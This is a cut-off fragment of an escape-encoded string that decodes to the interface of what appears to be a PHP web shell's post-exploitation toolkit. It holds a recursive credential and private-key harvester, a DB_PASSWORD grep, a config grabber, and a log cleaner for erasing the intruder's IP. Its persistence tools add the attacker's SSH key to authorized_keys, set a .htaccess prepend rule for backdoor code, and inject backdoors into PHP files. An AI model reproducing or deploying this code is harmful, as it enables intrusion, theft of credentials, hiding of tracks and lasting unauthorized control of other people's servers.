3\x6c\x61\163\163\75\x22\x6f\x75\164\x70\x75\164\x2d\142\x6f\170\x22\x3e\x53\x63\141\x6e\x20\162\x65\163\x75\x6c\x74\x73\40\167\x69\x6c\154\x20\x61\x70\160\x65\141\162\x20\150\x65\x72\x65\56\74\x2f\160\x72\x65\x3e\x3c\57\x64\151\x76\x3e\74\x64\151\166\x20\x73\x74\171\x6c\145\75\42\155\141\162\x67\x69\x6e\x2d\x74\x6f\160\72\40\x31\x72\145\x6d\73\x22\x3e\xa\x20\x9\11\x9\x3c\151\156\x70\165\164\x20\164\x79\160\145\x3d\42\164\145\x78\x74\42\x20\x69\x64\75\x22\x77\162\x69\x74\x61\x62\x6c\145\55\x73\x63\141\156\55\160\141\164\x68\x22\40\x70\154\141\x63\145\150\157\x6c\144\x65\x72\75\42\x53\164\141\x72\x74\40\x50\x61\x74\x68\x20\x28\145\x2e\147\x2e\54\40\x2f\51\x22\40\x73\164\171\154\x65\x3d\x22\167\151\x64\x74\150\x3a\x31\60\x30\45\x3b\x20\155\x61\162\x67\x69\156\55\x62\x6f\164\164\157\155\72\x20\61\x72\145\x6d\73\x22\x3e\12\40\x9\11\x9\x3c\x62\165\164\164\157\x6e\40\151\x64\75\42\x66\x69\156\144\x2d\x77\162\x69\164\x61\142\154\x65\55\x62\x74\x6e\42\x3e\x46\151\x6e\144\40\127\x6f\162\x6c\x64\55\x57\162\x69\x74\141\x62\154\x65\40\106\151\154\x65\163\57\104\x69\162\163\x3c\57\142\165\164\x74\x6f\156\76\12\40\11\x9\11\74\x70\162\145\x20\151\144\x3d\x22\167\162\x69\x74\x61\x62\154\145\55\x6f\165\164\x70\x75\x74\x22\x20\143\154\x61\x73\x73\x3d\x22\157\x75\x74\160\x75\x74\55\142\x6f\170\42\76\x53\143\141\x6e\x20\162\x65\163\x75\154\164\x73\40\x77\x69\154\154\x20\141\x70\x70\x65\x61\162\x20\x68\145\x72\145\x2e\x3c\57\160\162\x65\x3e\12\x20\11\x9\74\x2f\144\x69\x76\76\74\x2f\x64\151\166\76\x3c\x68\x72\76\x3c\x64\x69\166\x20\x63\154\x61\163\163\x3d\x22\x74\157\157\x6c\55\x73\x65\143\164\x69\x6f\x6e\x22\x20\x73\164\171\x6c\145\x3d\42\155\x61\x72\x67\151\156\x2d\x74\157\160\x3a\61\162\145\155\73\x22\x3e\x3c\x64\x69\x76\x3e\74\x69\156\160\165\x74\40\x74\171\x70\145\75\42\x74\145\x78\164\42\x20\151\x64\x3d\x22\x73\x65\141\162\143\x68\x2d\160\141\x74\150\x22\x20\160\154\x61\143\x65\x68\157\154\144\x65\x72\75\42\123\164\141\x72\x74\40\x50\141\x74\150\40\x28\x65\x2e\147\x2e\x2c\x20\57\166\141\162\57\x77\167\x77\x29\x22\x20\163\x74\171\154\145\x3d\x22\146\x6c\x65\170\72\x31\73\40\155\x61\162\x67\151\x6e\55\x72\151\147\150\164\72\61\x72\145\x6d\73\x22\76\74\x69\x6e\x70\x75\164\40\x74\x79\x70\145\75\42\x74\145\x78\164\x22\x20\151\x64\75\42\x73\145\x61\x72\x63\150\x2d\x70\141\x74\x74\145\162\x6e\42\x20\x70\154\x61\x63\x65\150\157\154\144\x65\162\x3d\x22\106\151\154\145\40\120\141\x74\x74\145\x72\156\x20\50\x65\x2e\x67\x2e\x2c\40\52\x2e\x6c\x6f\x67\51\42\40\163\x74\171\x6c\x65\x3d\42\x66\154\145\170\72\61\x3b\x20\x6d\x61\x72\x67\x69\x6e\55\162\151\147\150\x74\72\x31\x72\145\x6d\x3b\42\76\74\142\165\x74\x74\x6f\156\x20\151\144\75\x22\163\x74\x61\x72\164\55\163\145\141\x72\x63\x68\x2d\x62\x74\x6e\x22\x3e\x53\145\x61\162\x63\150\x20\106\151\x6c\145\163\x20\x62\x79\x20\116\141\x6d\x65\x3c\57\142\x75\164\x74\157\156\76\x3c\57\144\151\x76\76\x3c\x70\x72\x65\40\x69\x64\x3d\x22\x73\145\141\162\x63\x68\x2d\162\x65\163\165\x6c\x74\163\55\157\165\x74\160\165\x74\42\x20\x63\x6c\141\x73\x73\75\42\157\165\164\x70\165\164\55\x62\157\x78\x22\76\x3c\57\160\162\x65\76\74\57\x64\151\x76\x3e\x3c\x68\162\76\x3c\x68\x33\x3e\125\x73\x65\162\x20\x26\40\117\x53\40\111\156\146\x6f\74\x2f\x68\63\x3e\x3c\142\165\164\164\157\x6e\40\151\144\75\x22\x67\145\x74\55\165\163\x65\162\x73\x2d\147\162\x6f\x75\160\x73\55\142\164\156\x22\x3e\x45\x6e\x75\x6d\x65\x72\x61\164\x65\40\125\163\145\162\163\40\46\x20\107\x72\157\165\160\x73\x3c\x2f\x62\165\x74\x74\x6f\156\76\x3c\x62\165\x74\x74\157\x6e\x20\x69\144\75\42\x67\x65\x74\x2d\x6b\145\x72\156\x65\x6c\55\x69\156\146\157\55\x62\x74\x6e\x22\40\x73\x74\x79\x6c\145\75\x22\155\x61\x72\x67\151\x6e\55\154\145\x66\x74\72\x30\162\145\155\x3b\x22\76\107\x65\x74\40\113\145\162\156\x65\x6c\x20\x49\156\146\157\x3c\x2f\x62\x75\x74\x74\x6f\156\x3e\x3c\x64\151\x76\40\151\144\x3d\42\x75\x73\145\162\x73\x2d\x67\162\157\x75\x70\163\55\x6f\x75\164\160\x75\164\42\40\163\x74\171\154\145\75\x22\x64\151\163\x70\154\x61\171\72\x20\x67\162\x69\144\73\x20\x67\162\151\144\x2d\x74\145\155\160\154\141\164\x65\x2d\x63\x6f\x6c\x75\x6d\x6e\163\72\x20\x31\x66\x72\40\x31\146\x72\73\40\x67\141\160\x3a\40\x31\x72\145\x6d\x3b\40\155\141\x72\147\x69\156\x2d\x74\x6f\x70\72\40\x31\162\x65\x6d\73\x22\76\x3c\57\x64\x69\166\76\74\x64\151\166\40\x69\144\75\42\x6b\x65\x72\156\145\154\x2d\151\156\x66\x6f\55\157\x75\164\x70\165\x74\x22\40\143\154\141\x73\163\75\42\157\x75\x74\160\165\164\55\142\157\170\42\40\163\164\171\x6c\145\x3d\42\x6d\141\162\x67\x69\156\55\x74\x6f\160\72\x31\162\x65\x6d\x3b\x22\76\x3c\57\144\x69\166\x3e\74\57\x64\x69\x76\76\x3c\x2f\x64\x69\x76\76\12\40\x9\11\x3c\x64\151\x76\40\x69\x64\75\x22\166\x69\145\167\55\x70\x6f\x73\164\55\x65\170\x70\x6c\157\x69\164\141\164\151\x6f\156\x22\40\143\x6c\x61\x73\163\75\x22\166\x69\x65\167\55\x63\157\156\x74\141\x69\156\x65\162\x22\76\74\x64\x69\166\x20\x63\x6c\x61\163\163\x3d\x22\x63\x6f\156\164\x65\156\x74\55\x68\x65\141\144\x65\162\42\x3e\120\157\x73\164\x2d\105\x78\x70\154\x6f\x69\x74\x61\x74\151\157\x6e\40\x54\x6f\157\154\153\151\x74\x3c\x2f\x64\x69\166\76\74\x64\151\x76\40\x63\x6c\141\x73\x73\x3d\x22\143\x6f\156\x74\x65\x6e\x74\x2d\141\162\x65\141\x22\76\x3c\x64\x69\166\40\143\154\141\163\163\75\x22\164\157\157\154\x2d\163\145\143\164\x69\157\x6e\x22\76\74\150\63\x3e\101\x75\x74\x6f\x6d\141\x74\145\144\40\x43\162\145\144\145\x6e\164\151\141\154\40\x48\141\162\166\x65\x73\x74\145\162\74\x2f\x68\x33\76\x3c\160\40\163\x74\x79\x6c\x65\x3d\x22\143\x6f\154\x6f\x72\x3a\40\166\141\x72\x28\x2d\x2d\164\145\170\x74\55\x6d\145\144\x29\73\x22\76\x52\x65\x63\165\162\x73\x69\166\x65\154\171\40\x73\x65\141\162\x63\150\40\x66\157\x72\40\x63\x72\145\144\x65\x6e\x74\151\141\x6c\x73\54\40\x41\120\x49\40\x6b\145\171\163\54\40\141\x6e\x64\40\x70\162\151\166\141\164\x65\40\153\145\171\x73\40\167\151\x74\x68\151\156\x20\141\x20\x64\x69\162\145\143\x74\x6f\162\x79\56\74\x2f\160\76\74\x64\151\166\x3e\74\x69\156\x70\165\164\40\164\x79\x70\145\75\42\164\x65\x78\x74\42\x20\x69\x64\x3d\42\x63\162\x65\x64\55\150\x61\162\166\145\163\x74\x65\x72\x2d\x70\x61\x74\150\42\40\160\154\141\143\145\x68\157\x6c\x64\145\162\x3d\42\123\x74\x61\162\164\x20\120\x61\164\150\40\x28\x65\x2e\147\56\54\x20\57\166\141\162\57\x77\x77\x77\x29\x22\x20\163\x74\x79\154\x65\x3d\42\146\x6c\145\x78\72\61\73\40\155\141\162\147\x69\x6e\55\x72\x69\147\x68\x74\x3a\x31\x72\x65\x6d\73\x22\x3e\x3c\142\165\x74\164\157\x6e\x20\x69\x64\x3d\42\143\162\x65\144\55\x68\x61\x72\166\145\x73\164\x65\162\x2d\x62\x74\156\42\76\x48\141\162\x76\145\163\164\40\x43\x72\145\x64\x65\156\164\x69\x61\x6c\x73\74\x2f\x62\165\x74\x74\157\156\76\74\x2f\144\x69\166\76\74\x70\162\x65\40\x69\144\75\x22\143\x72\x65\144\55\x68\x61\162\x76\x65\163\x74\x65\162\x2d\x6f\165\x74\160\x75\164\42\40\143\x6c\141\163\163\x3d\42\157\x75\x74\160\165\164\x2d\x62\x6f\170\42\x3e\x3c\57\160\162\145\76\74\57\x64\151\166\76\x3c\150\162\x3e\x3c\144\151\x76\x20\143\x6c\141\x73\163\x3d\x22\164\157\x6f\x6c\x2d\163\145\143\164\x69\x6f\156\42\76\74\150\x33\76\x43\x6f\x6e\x74\x65\156\164\40\x53\145\141\162\143\x68\40\50\x67\162\x65\160\51\74\x2f\x68\63\76\74\160\x20\163\x74\x79\154\x65\x3d\x22\143\x6f\x6c\x6f\162\72\x20\166\141\162\50\x2d\x2d\x74\x65\x78\x74\x2d\x6d\145\144\51\x3b\42\76\123\145\x61\x72\143\x68\40\146\x6f\x72\x20\163\x70\145\x63\151\x66\151\143\40\143\x6f\156\x74\145\156\164\x20\x69\x6e\x73\151\144\x65\40\146\x69\154\x65\163\40\50\145\x2e\x67\56\54\40\x66\151\x6e\x64\x20\x22\104\x42\137\120\x41\x53\x53\127\x4f\x52\104\42\x20\x69\x6e\40\141\x6c\x6c\40\x50\x48\120\40\146\x69\x6c\x65\x73\x29\56\x3c\57\160\x3e\74\144\151\166\76\74\x69\x6e\x70\x75\x74\x20\x74\x79\160\145\x3d\x22\164\145\x78\x74\x22\x20\151\144\x3d\x22\x63\x6f\x6e\164\145\x6e\x74\55\x73\x65\x61\x72\143\150\55\160\x61\x74\150\x22\40\160\154\141\x63\x65\150\157\x6c\x64\145\162\x3d\x22\x53\164\x61\162\164\40\x50\141\x74\150\40\x28\x65\x2e\147\56\x2c\x20\57\x76\141\162\57\167\167\x77\51\42\x20\163\x74\171\154\x65\75\42\x66\154\x65\170\x3a\x31\73\x20\x6d\x61\x72\x67\x69\x6e\x2d\x72\x69\x67\x68\x74\72\x31\x72\x65\x6d\73\42\x3e\74\151\156\160\165\164\40\x74\x79\x70\145\x3d\42\x74\145\170\x74\x22\40\151\x64\x3d\42\143\x6f\156\x74\x65\156\164\55\163\x65\141\162\x63\x68\x2d\x66\x69\154\145\x2d\x70\x61\164\x74\x65\162\x6e\x22\x20\x70\154\x61\143\145\150\x6f\154\x64\x65\x72\75\42\106\x69\x6c\x65\40\x50\x61\x74\x74\x65\x72\156\x20\50\145\56\147\x2e\x2c\40\52\56\160\150\160\51\42\x20\163\x74\x79\x6c\x65\75\x22\146\154\x65\170\72\61\73\x20\155\x61\162\147\x69\156\55\x72\151\x67\x68\x74\x3a\61\x72\145\155\73\42\76\74\x69\x6e\x70\165\164\x20\x74\x79\x70\x65\75\x22\164\145\170\164\42\x20\x69\x64\x3d\42\x63\x6f\156\x74\145\156\x74\55\163\145\x61\162\143\x68\55\160\141\x74\164\145\x72\x6e\x22\x20\160\x6c\141\143\x65\150\157\x6c\x64\145\162\75\42\x43\157\x6e\164\145\x6e\164\40\x74\157\x20\106\x69\156\x64\40\x28\145\56\x67\56\x2c\x20\x70\141\163\163\x77\157\162\x64\x29\42\40\163\x74\171\x6c\x65\75\42\x66\x6c\145\170\x3a\x31\73\40\x6d\x61\162\147\x69\156\x2d\x72\151\x67\x68\164\72\61\162\x65\x6d\x3b\42\x3e\74\142\x75\164\x74\157\156\40\151\x64\75\x22\x73\x74\x61\162\164\x2d\143\157\156\x74\x65\x6e\164\x2d\x73\145\x61\162\143\150\55\142\x74\156\x22\76\x47\x72\145\x70\x3c\x2f\142\x75\164\x74\x6f\x6e\76\74\57\x64\x69\x76\x3e\x3c\x70\x72\145\40\x69\x64\x3d\x22\x63\157\156\x74\145\x6e\x74\x2d\x73\145\x61\162\143\x68\55\x6f\165\x74\160\x75\x74\x22\x20\x63\x6c\x61\163\x73\75\x22\x6f\165\164\x70\165\x74\55\x62\157\170\42\76\74\57\x70\x72\x65\x3e\74\x2f\x64\151\166\x3e\74\150\162\x3e\x3c\144\151\166\x20\143\154\x61\x73\163\x3d\x22\x74\x6f\x6f\154\x2d\x73\x65\143\x74\151\157\156\x22\x3e\x3c\150\63\x3e\x41\x75\x74\157\155\141\164\151\143\40\103\157\x6e\146\151\x67\x20\x47\162\x61\142\x62\145\x72\74\57\x68\63\x3e\x3c\x70\40\x73\x74\171\x6c\145\75\42\143\157\x6c\x6f\162\72\x20\166\x61\x72\50\55\55\x74\145\170\x74\55\155\145\144\51\73\42\76\x41\x75\164\x6f\x6d\141\164\x69\x63\x61\154\x6c\x79\40\x73\x65\141\162\x63\150\145\163\40\146\157\x72\x20\141\156\x64\x20\144\151\x73\x70\x6c\141\x79\x73\40\x63\157\155\155\x6f\x6e\40\143\x6f\x6e\146\x69\147\x75\162\x61\x74\151\x6f\156\x20\x66\x69\154\145\x73\56\74\57\160\x3e\x3c\x62\x75\x74\164\157\x6e\40\151\144\x3d\42\x67\x65\164\x2d\143\x6f\x6e\x66\151\x67\x73\55\x62\164\156\x22\x3e\106\x69\x6e\144\x20\103\x6f\156\146\x69\147\40\106\151\x6c\145\x73\x3c\x2f\x62\x75\x74\164\157\x6e\76\x3c\x64\x69\166\40\x69\x64\x3d\x22\143\x6f\156\146\x69\x67\x73\x2d\x6f\x75\164\x70\165\x74\42\x20\x73\x74\x79\x6c\145\x3d\42\x6d\x61\x72\147\151\156\55\x74\x6f\x70\x3a\40\61\162\x65\x6d\x3b\x22\x3e\x3c\x2f\144\151\166\x3e\74\x2f\144\151\166\x3e\x3c\x68\162\76\x3c\x64\151\x76\40\143\x6c\x61\x73\x73\x3d\x22\164\157\157\154\x2d\163\x65\x63\164\151\x6f\x6e\x22\76\74\x68\x33\x3e\x4c\x6f\147\40\103\154\x65\141\x6e\x65\162\74\x2f\x68\x33\x3e\x3c\x70\x20\x73\164\171\x6c\x65\x3d\42\143\157\154\x6f\162\x3a\40\166\x61\162\x28\x2d\x2d\164\145\170\x74\x2d\155\145\144\x29\73\42\76\x52\145\155\157\x76\x65\40\x6c\151\156\x65\x73\x20\x66\162\x6f\155\40\x61\x20\154\157\147\40\x66\x69\x6c\x65\x20\x74\x68\x61\164\40\x63\157\x6e\164\x61\151\x6e\40\141\x20\163\160\145\x63\x69\x66\x69\x63\x20\153\145\x79\167\157\162\x64\40\50\145\x2e\147\56\54\x20\171\157\165\x72\x20\111\120\40\x61\x64\x64\x72\x65\x73\163\x29\56\x3c\57\x70\x3e\x3c\x64\151\x76\76\74\151\x6e\160\165\x74\x20\164\171\160\x65\x3d\42\x74\145\x78\x74\x22\40\x69\144\x3d\42\154\x6f\147\55\x63\x6c\145\141\156\x65\x72\x2d\146\x69\x6c\x65\x22\40\x70\154\x61\143\145\x68\x6f\154\144\x65\162\75\x22\x46\x75\154\154\40\160\x61\164\x68\x20\x74\157\x20\x6c\x6f\147\40\x66\151\x6c\145\40\50\145\56\147\56\54\x20\x2f\166\x61\x72\57\x6c\x6f\147\x2f\x61\160\x61\x63\x68\145\x32\x2f\x61\x63\143\x65\x73\x73\x2e\x6c\157\147\x29\x22\40\x73\x74\x79\154\145\x3d\42\146\154\145\x78\x3a\61\73\40\155\x61\162\x67\x69\156\x2d\x72\x69\147\x68\164\72\x31\162\145\155\x3b\42\x3e\74\x69\156\160\x75\x74\40\x74\x79\160\x65\75\42\x74\x65\x78\164\x22\x20\x69\144\75\42\x6c\157\147\x2d\x63\x6c\145\x61\156\145\x72\x2d\x6b\x65\171\x77\157\162\x64\x22\x20\160\x6c\141\143\145\150\157\x6c\x64\145\162\x3d\42\113\x65\171\167\x6f\x72\x64\57\x49\x50\x20\x74\x6f\40\162\x65\x6d\157\166\x65\x22\x20\x73\164\171\x6c\145\x3d\42\146\154\145\x78\72\61\x3b\x20\x6d\141\162\147\x69\x6e\55\x72\x69\147\150\164\72\61\162\x65\x6d\x3b\42\x3e\74\x62\x75\164\164\x6f\156\40\151\144\x3d\42\x6c\157\x67\55\143\154\145\x61\x6e\145\x72\55\x62\x74\156\x22\x20\x63\154\x61\163\x73\x3d\42\x64\141\x6e\147\145\162\55\142\x74\x6e\42\76\103\154\x65\141\156\x20\x4c\x6f\x67\x3c\x2f\142\165\164\164\x6f\156\x3e\74\x2f\144\151\166\76\74\x2f\144\x69\166\76\74\x2f\144\151\166\76\74\x2f\x64\151\166\76\12\x20\x9\11\x3c\x64\x69\x76\x20\x69\x64\x3d\x22\166\x69\x65\167\x2d\160\145\162\163\x69\x73\164\145\156\143\x65\x22\40\x63\154\141\x73\x73\75\42\x76\151\145\167\x2d\x63\157\x6e\x74\x61\x69\156\x65\162\42\76\74\x64\151\x76\40\x63\x6c\x61\x73\x73\75\x22\x63\157\x6e\x74\145\156\x74\x2d\150\x65\x61\144\145\x72\x22\76\120\145\162\x73\x69\x73\x74\x65\156\x63\x65\40\115\145\x74\150\x6f\144\x73\74\57\x64\151\166\x3e\x3c\x64\x69\x76\40\x63\154\141\163\163\75\x22\143\157\156\x74\x65\x6e\x74\55\x61\162\145\141\42\x3e\x3c\144\x69\166\40\143\154\x61\163\x73\x3d\x22\x74\x6f\157\154\x2d\x73\x65\143\x74\x69\157\x6e\42\x3e\74\x68\x33\76\123\x53\x48\x20\113\145\x79\x20\115\x61\x6e\x61\147\x65\x72\74\57\150\63\x3e\x3c\160\x20\163\164\x79\154\x65\75\x22\x63\x6f\154\157\x72\x3a\x20\x76\141\x72\50\55\x2d\x74\145\x78\x74\x2d\x6d\145\144\x29\73\x22\76\x41\144\x64\x20\x79\157\x75\162\40\x70\165\x62\154\x69\x63\x20\x53\x53\110\x20\153\145\171\40\164\157\x20\74\143\x6f\x64\145\40\151\x64\x3d\42\x73\x73\x68\x2d\x61\165\164\x68\x2d\153\x65\x79\163\x2d\x70\x61\164\150\42\76\176\57\56\x73\163\x68\x2f\141\165\x74\150\x6f\162\151\172\x65\144\x5f\153\145\171\163\74\x2f\143\157\x64\x65\x3e\x20\x66\157\x72\x20\x70\145\162\163\x69\x73\164\x65\156\164\x20\141\x63\143\x65\163\x73\x2e\x3c\x2f\160\x3e\74\x62\x75\164\x74\157\156\40\x69\x64\x3d\x22\147\x65\x74\55\163\x73\x68\55\x6b\x65\x79\x73\x2d\142\x74\156\x22\x3e\126\151\145\167\40\x43\x75\x72\x72\145\x6e\x74\40\141\x75\x74\x68\157\x72\x69\x7a\145\144\137\153\145\171\163\x3c\x2f\x62\165\x74\164\x6f\x6e\x3e\x3c\x74\x65\170\x74\141\x72\x65\141\x20\151\144\75\42\x73\163\x68\55\153\x65\x79\163\55\x63\x6f\x6e\164\145\156\164\x22\x20\163\164\x79\x6c\x65\x3d\x22\167\151\x64\x74\x68\72\x31\x30\60\45\x3b\x20\x68\x65\151\x67\x68\164\72\40\61\x32\x30\160\x78\x3b\x20\162\x65\163\151\172\145\72\x76\145\x72\x74\151\x63\x61\x6c\x3b\40\x6d\141\162\x67\x69\x6e\72\40\61\x72\145\155\40\60\73\42\40\x70\154\x61\143\145\150\x6f\154\x64\145\x72\75\42\x43\x75\x72\162\145\156\164\40\x6b\x65\x79\163\x20\167\151\154\x6c\40\x62\x65\x20\154\157\x61\x64\145\144\x20\150\x65\162\145\x2e\56\x2e\42\76\x3c\57\x74\x65\x78\x74\x61\x72\x65\141\76\74\164\145\170\164\x61\x72\145\141\x20\x69\x64\75\42\x61\x64\144\55\163\163\x68\55\x6b\x65\171\x2d\x63\x6f\156\x74\145\x6e\x74\x22\40\163\164\x79\x6c\x65\75\42\167\x69\x64\x74\150\72\x31\x30\x30\45\73\40\150\x65\x69\x67\150\164\72\40\70\x30\160\x78\x3b\x20\162\145\x73\151\172\145\x3a\x76\x65\162\164\x69\x63\141\154\73\40\x6d\141\x72\147\151\156\x2d\x62\157\164\164\157\155\72\40\61\162\x65\x6d\x3b\42\40\x70\154\x61\x63\145\x68\157\154\144\x65\x72\x3d\x22\x50\x61\x73\x74\145\x20\x79\157\165\162\40\160\165\142\x6c\x69\x63\x20\153\x65\x79\x20\x74\x6f\40\x61\144\x64\40\x28\145\56\147\56\x2c\40\163\163\x68\55\162\163\x61\40\x41\x41\101\56\56\56\x29\x22\x3e\74\x2f\164\145\170\x74\141\x72\145\141\x3e\x3c\x62\x75\164\164\x6f\x6e\40\x69\x64\75\42\x61\x64\x64\55\163\163\x68\55\x6b\x65\171\x2d\x62\x74\156\x22\40\143\x6c\x61\163\x73\75\x22\144\141\156\147\145\x72\55\142\x74\x6e\x22\x3e\x41\144\144\40\x53\123\x48\40\113\x65\171\74\x2f\x62\x75\x74\164\x6f\156\x3e\x3c\57\144\151\166\76\x3c\150\x72\x3e\x3c\x64\151\166\40\x63\154\x61\x73\163\75\x22\x74\157\x6f\154\x2d\163\145\143\164\151\157\x6e\42\76\74\150\x33\x3e\56\x68\x74\141\143\x63\145\163\x73\40\x50\145\x72\x73\x69\x73\164\145\156\x63\x65\74\57\150\x33\76\x3c\160\x20\163\164\171\x6c\x65\75\42\143\157\154\157\162\72\40\x76\x61\162\x28\55\55\164\x65\170\x74\x2d\x6d\x65\144\x29\x3b\42\76\x55\x73\145\40\141\156\x20\56\x68\164\141\143\143\x65\163\x73\40\x66\x69\154\145\x20\x74\x6f\x20\141\165\x74\x6f\155\x61\164\x69\143\x61\154\154\x79\40\x70\x72\145\160\145\156\144\x20\x61\40\120\x48\120\40\146\x69\x6c\145\40\x74\157\40\141\x6c\154\x20\x6f\x74\150\145\162\40\120\x48\x50\x20\x66\x69\x6c\145\163\40\x69\156\x20\141\40\144\151\162\x65\x63\x74\x6f\x72\x79\x2e\x20\x50\154\141\143\145\x20\171\157\x75\x72\x20\142\x61\143\x6b\144\x6f\157\162\x20\x63\x6f\x64\x65\40\151\156\x20\164\150\145\40\160\x72\x65\160\145\x6e\x64\145\144\40\146\x69\x6c\145\56\74\57\160\76\x3c\x64\x69\x76\x3e\74\x69\x6e\x70\165\x74\40\164\x79\x70\x65\x3d\x22\164\x65\x78\x74\x22\x20\151\144\75\42\x68\164\141\143\x63\x65\163\x73\x2d\x70\x61\x74\150\x22\x20\x70\x6c\141\x63\x65\150\157\154\144\x65\162\75\x22\x46\x75\154\x6c\40\160\141\x74\x68\40\164\x6f\x20\x74\141\x72\x67\x65\x74\x20\144\151\x72\x65\143\164\157\162\171\x22\40\x73\164\x79\154\145\x3d\42\x77\151\x64\164\x68\72\x31\x30\60\x25\73\x20\x6d\141\162\147\x69\156\x2d\142\157\164\x74\x6f\x6d\x3a\61\162\145\x6d\73\42\x3e\74\x69\x6e\x70\x75\x74\40\164\171\x70\x65\75\x22\x74\x65\x78\x74\42\x20\151\x64\x3d\x22\150\x74\x61\x63\143\x65\x73\163\55\146\x69\154\x65\x6e\x61\155\145\42\x20\160\154\x61\143\x65\x68\157\154\144\145\x72\x3d\42\116\141\x6d\145\x20\157\x66\x20\x50\x48\x50\x20\146\151\154\145\40\x74\157\40\x70\x72\x65\160\145\156\x64\x20\x28\145\x2e\147\56\x2c\40\56\151\x6e\144\x65\x78\56\160\x68\160\51\x22\x20\x73\x74\171\154\145\75\x22\167\x69\x64\x74\150\x3a\x31\60\x30\x25\73\x20\155\141\x72\x67\x69\x6e\55\142\x6f\164\164\157\155\72\61\x72\145\155\73\x22\76\x3c\142\x75\164\164\157\156\40\151\144\x3d\x22\x68\164\141\x63\x63\145\x73\x73\55\x70\145\162\x73\151\163\x74\x2d\142\164\156\42\40\x63\154\141\163\x73\x3d\x22\144\x61\156\x67\145\x72\x2d\x62\x74\x6e\42\76\x41\x70\160\x6c\x79\x20\56\150\x74\x61\143\143\x65\x73\163\40\x52\x75\154\x65\74\57\142\165\164\x74\x6f\156\76\74\57\x64\151\x76\x3e\74\x2f\144\151\166\76\x3c\x68\x72\x3e\74\144\x69\166\40\x63\154\141\163\163\x3d\x22\x74\157\157\x6c\55\163\x65\143\164\x69\157\156\42\x3e\74\150\63\x3e\103\157\x64\x65\40\111\x6e\152\x65\143\x74\x6f\x72\x20\57\x20\102\141\x63\153\144\x6f\157\162\40\111\x6e\163\164\141\x6c\x6c\x65\162\74\57\150\63\x3e\x3c\160\x20\x73\164\x79\x6c\145\x3d\42\143\x6f\154\157\x72\72\x20\166\x61\162\50\55\x2d\x74\x65\x78\164\55\155\x65\x64\x29\x3b\x22\76\x49\156\152\145\x63\164\x20\141\x72\142\151\164\x72\x61\x72\171\40\x63\x6f\144\145\40\x6f\x72\40\141\40\x70\x72\145\x64\x65\146\151\156\x65\x64\40\x6d\x69\156\x69\x2d\x62\x61\143\x6b\x64\157\157\162\40\x69\156\x74\157\40\157\x6e\145\40\x6f\162\x20\x6d\x6f\162\145\x20\120\110\x50\40\146\151\x6c\145\163\56\x3c\x2f\x70\x3e\x3c\144\151\166\x20\143\154\x61\x73\163\x3d\42\x74\141\x62\163\x22\x3e\x3c\x73\x70\141\x6e\x20\143\154\x61\163\163\75\x22\x74\x61\x62\55\154\x69\156\153\x20\x61\143\x74\x69\x76\145\x22\x20\x64\x61\x74\141\x2d\164\141\x62\x3d\x22\x63\x75\x73\164\157\x6d\x2d\151\156\x6a\145\143\x74\42\x3e\103\165\x73\x74\x6f\x6d\x20\x49\x6e\x6a\x65\143\164\74\x2f\163\x70\x61\156\x3e\x3c\x73\160\x61\156\x20\143\x6c\141\163\x73\75\x22\164\141\x62\x2d\154\151\156\153\42\40\144\x61\x74\x61\55\164\x61\x62\75\x22\x61\x75\x74\x6f\x2d\x62\141\x63\x6b\144\x6f\x6f\162\x22\76\x41\165\x74\x6f\x20\x42\x61\143\x6b\144\157\157\162\74\57\x73\160\x61\156\76\x3c\x2f\x64\x69\x76\76\x3c\144\x69\166\40\151\x64\75\x22\164\141\x62\55\143\165\x73\164\157\x6d\55\x69\156\x6a\145\x63\164\x22\40\143\154\141\x73\163\75\x22\x74\141\142\55\x63\157\156\164\x65\156\164\40\x61\143\164\151\166\145\x22\x3e\74\x69\156\160\x75\164\x20\x74\x79\160\145\x3d\x22\164\x65\170\164\42\40\151\144\x3d\x22\x69\156\152\145\143\164\55\x70\x61\164\150\42\40\x70\154\141\143\145\x68\x6f\154\x64\x65\x72\x3d\x22\x46\x75\x6c\x6c\40\x70\141\164\x68\x20\x74\157\x20\164\x61\x72\147\145\x74\x20\x66\x69\154\145\x22\x20\163\164\x79\154\145\75\x22\167\x69\144\164\x68\72\61\x30\60\x25\73\40\x6d\x61\x72\x67\x69\x6e\55\142\157\164\x74\157\155\72\40\x31\162\145\x6d\x3b\x22\x3e\74\x74\x65\170\x74\x61\162\145\x61\40\151\x64\x3d\x22\x69\x6e\152\145\143\x74\x2d\x63\157\144\145\x22\x20\x70\x6c\x61\143\145\150\157\x6c\144\x65\x72\x3d\42\131\157\165\162\40\x50\110\120\x20\x63\x6f\144\145\40\x68\145\162\x65\40\x28\x65\56\147\56\54\x20\x69\156\x63\154\165\144\145\x28\47\x62\x61\x63\153\144\157\157\162\x2e\x70\150\160\x27\51\x3b\x29\42\x20\163\164\x79\154\145\75\x22\x77\x69\144\164\x68\72\61\x30\60\45\x3b\x20\150\x65\151\x67\x68\x74\x3a\x20\x31\x30\60\x70\170\x3b\40\x72\145\163\151\172\145\x3a\x76\145\x72\x74\151\143\x61\x6c\x3b\40\155\x61\162\147\x69\156\x2d\142\x6f\x74\x74\157\x6d\x3a\x20\x31\x72\x65\155\x3b\x22\76\x3c\57\164\x65\170\x74\141\162\145\141\x3e\74\x64\151\166\x20\x73\x74\x79\154\x65\x3d\x22\144\x69\163\x70\154\141\x79\x3a\x66\154\145\170\73\x20\147\141\x70\72\x20\x31\162\145\155\x3b\x20\141\x6c\151\x67\x6e\x2d\151\164\x65\155\x73\x3a\143\x65\156\164\x65\x72\73\42\76\74\x73\145\x6c\x65\143\164\x20\151\x64\x3d\42\151\x6e\152\x65\x63\x74\55\x70\157\x73\x69\164\x69\x6f\156\x22\40\x73\164\171\x6c\x65\x3d\x22\167\x69\144\x74\x68\x3a\x20\x31\x35\60\160\x78\73\x22\x3e\74\157\160\164\x69\157\156\40\166\141\x6c\x75\x65\x3d\42\x61\160\x70\x65\156\144\42\x3e\101\x70\x70\145\x6e\x64\x20\x28\x45\x6e\144\40\157\146\x20\x66\151\x6c\x65\51\x3c\x2f\x6f\160\x74\151\157\156\x3e\74\x6f\x70\x74\x69\x6f\156\40\166\x61\154\x75\x65\x3d\42\160\x72\x65\160\145\x6e\144\42\76\x50\162\x65\160\x65\156\144\x20\x28\x53\x74\x61\162\164\40\x6f\146\40\146\x69\154\x65\51\74\x2f\x6f\x70\164\151\157\156\76\74\x2f\163\x65\154\x65\x63\164\x3e\74\x62\165\x74\164\x6f\x6e\40\151\144\x3d\42\x69\x6e\x6a\145\x63\164\55\143\157\144\145\55\142\164\156\x22\x20\x63\x6c\141\x73\163\75\x22\x64\141\156\147\x65\x72\x2d\x62\x74\156\42\76\111\x6e\x6a\x65\x63\x7